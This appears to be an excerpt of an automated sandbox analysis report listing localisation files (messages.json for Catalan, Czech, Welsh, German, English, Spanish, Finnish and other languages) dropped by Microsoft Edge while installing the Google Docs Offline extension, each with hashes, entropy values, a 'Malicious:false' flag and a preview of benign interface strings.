                                                                                                                                                            SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):913
                                                                                                                                                            Entropy (8bit):4.947221919047
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                            MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                            SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                            SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                            SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):806
                                                                                                                                                            Entropy (8bit):4.815663786215102
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                            MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                            SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                            SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                            SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):883
                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                            MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                            SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                            SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                            SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1031
                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1613
                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):851
                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):851
                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):848
                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                            MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                            SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                            SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                            SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1425
                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                            MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                            SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                            SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                            SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):961
                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                            MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                            SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                            SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                            SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):959
                                                                                                                                                            Entropy (8bit):4.570019855018913
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                            MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                            SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                            SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                            SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):968
                                                                                                                                                            Entropy (8bit):4.633956349931516
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                            MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                            SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                            SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                            SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):838
                                                                                                                                                            Entropy (8bit):4.4975520913636595
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                            MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                            SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                            SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                            SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1305
                                                                                                                                                            Entropy (8bit):4.673517697192589
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                            MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                            SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                            SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                            SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):911
                                                                                                                                                            Entropy (8bit):4.6294343834070935
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                            MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                            SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                            SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                            SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                            Download File
